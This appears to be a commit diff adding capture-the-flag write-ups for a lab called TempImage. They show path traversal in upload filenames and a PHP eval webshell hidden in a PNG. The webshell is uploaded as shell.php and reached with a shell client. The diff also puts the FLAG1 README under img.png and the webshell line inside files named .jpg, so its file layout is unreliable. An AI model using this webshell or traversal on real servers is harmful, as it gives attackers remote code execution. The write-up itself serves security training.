TempImage

Author: testert1ng

Diff for: tempimage/flag0/README.md

@@ -0,0 +1,29 @@
+# TempImage - FLAG0
+
+## 0x00 Index
+
+![](./imgs/index.jpg)
+
+## 0x01 Upload
+
+![](./imgs/upload.jpg)
+
+The image is successfully uploaded to the site.
+
+```
+http://127.0.0.1:5001/xxxxxxxxxx/files/d10c88f869301b1238f53cfdff8e9d7c_img.png
+```
+
+## 0x02 Modify File Name
+
+Modify file name in Burp
+
+```
+Content-Disposition: form-data; name="filename"
+
+../img.png
+```
+
+## 0x03 Upload Error and FLAG
+
+![](./imgs/flag.jpg)

Diff for: tempimage/flag0/img.png

@@ -0,0 +1,45 @@
+# TempImage - FLAG1
+
+## 0x00 Index
+
+![](../flag0/imgs/index.jpg)
+
+## 0x01 Generate Image Shell
+
+Run bat file [gen_imgshell.bat](./gen_imgshell.bat).
+
+```batch
+copy img.png/b + webshell.php shell.png
+```
+
+Get shell.png which has the injected code.
+
+```php
+<?php @eval($_POST['hacker1'])?>
+```
+
+![](./shell.png)
+
+## 0x02 Upload the Image Shell
+
+Catch the request and change the file name.
+
+```
+Content-Disposition: form-data; name="filename"
+
+/../../shell.php
+```
+
+Shell upload successfully.
+
+![](./imgs/shell_upload.jpg)
+
+## 0x03 Connect Server 
+
+![](./imgs/caidao.jpg)
+
+## 0x04 FLAG
+
+Flag can be found in index.php
+
+![](./imgs/flag.jpg)

Diff for: tempimage/flag0/imgs/flag.jpg

@@ -0,0 +1 @@
+copy img.png/b + webshell.php shell.png

Diff for: tempimage/flag0/imgs/index.jpg

@@ -0,0 +1 @@
+<?php @eval($_POST['hacker1'])?>